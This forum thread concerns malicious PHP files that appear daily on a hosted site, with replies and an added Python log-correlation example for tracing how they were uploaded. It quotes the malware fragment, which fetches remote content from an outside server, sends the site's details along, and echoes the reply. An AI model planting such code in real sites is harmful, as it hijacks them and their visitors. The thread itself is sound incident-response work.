Find out how files were uploaded
Hi, I am dealing with a security issue inside an account. Every day new files are uploaded to public_html and subfolders, with strange content inside.
For example:
/home/xxx/public_html/rtrfei.php
/home/xxx/public_html/fdbs.php
The content is pretty much the same in all of the files:
[PHP].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/AK47/2.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
?>[/PHP]
I would like to know if there is any way of finding out how these files were uploaded (FTP, SCP, SSH, via a script on the server, etc.).
I think this is the first step to be able to identify the root cause of this issue.
I do have root access to the server.
Thanks!
-
You need to get a timestamp of when the files were placed on the server, then look for activity (cPanel access, FTP, web) around that same time. That will help lead you in the direction of how the files came to be on the server.
-
You would just have to check network and file access logs on the server.
-
Hello, you may find some of the solutions in the following thread helpful: "need help preventing malicious spam .php scripts". Thank you.
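
The correlation suggested in the first reply (take the file's timestamp, then look for activity around that time) can be scripted. The following is an added example, not part of the original thread: it assumes Apache "combined" access-log lines and xferlog-format FTP lines, and the log lines, IP addresses and timestamp in it are constructed sample data.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" format: client ident user [time] "METHOD path proto" status ...
APACHE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def ctime_utc(path):
    """Inode change time of a file; unlike mtime, touch cannot backdate it."""
    return datetime.fromtimestamp(os.stat(path).st_ctime, timezone.utc)

def web_writes(lines):
    """Yield (time, channel, source, detail) for POST/PUT requests."""
    for line in lines:
        m = APACHE.match(line)
        if m and m.group(3) in ("POST", "PUT"):
            ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
            yield ts, "web", m.group(1), f"{m.group(3)} {m.group(4)} {m.group(5)}"

def ftp_uploads(lines, tz=timezone.utc):
    """Yield uploads from xferlog-format lines (direction field 'i').
    Assumes the log clock is `tz` and filenames contain no spaces."""
    for line in lines:
        f = line.split()
        if len(f) >= 18 and f[11] == "i":
            ts = datetime.strptime(" ".join(f[:5]), "%a %b %d %H:%M:%S %Y")
            yield ts.replace(tzinfo=tz), "ftp", f[6], f"user={f[13]} file={f[8]}"

def correlate(file_time, events, window=timedelta(seconds=60)):
    """Events within `window` of the file's timestamp, nearest first."""
    near = [e for e in events if abs(e[0] - file_time) <= window]
    return sorted(near, key=lambda e: abs(e[0] - file_time))

# Constructed sample data (not taken from the thread).
ACCESS_LOG = [
    '198.51.100.23 - - [05/Mar/2024:02:14:07 +0000] "POST /form/upload.php HTTP/1.1" 200 31 "-" "curl/8.0"',
    '203.0.113.9 - - [05/Mar/2024:02:14:30 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [05/Mar/2024:09:00:00 +0000] "POST /contact.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]
XFERLOG = [
    'Tue Mar  5 01:02:03 2024 1 192.0.2.44 2048 /home/xxx/public_html/logo.png b _ i r xxx ftp 0 * c',
]
# Constructed timestamp for rtrfei.php; on a live server use ctime_utc(path).
DROPPED_AT = datetime(2024, 3, 5, 2, 14, 8, tzinfo=timezone.utc)

def demo():
    events = list(web_writes(ACCESS_LOG)) + list(ftp_uploads(XFERLOG))
    return correlate(DROPPED_AT, events)
```

With the sample data, the only event inside the 60-second window is the web POST, which points at a script on the site rather than FTP as the upload channel.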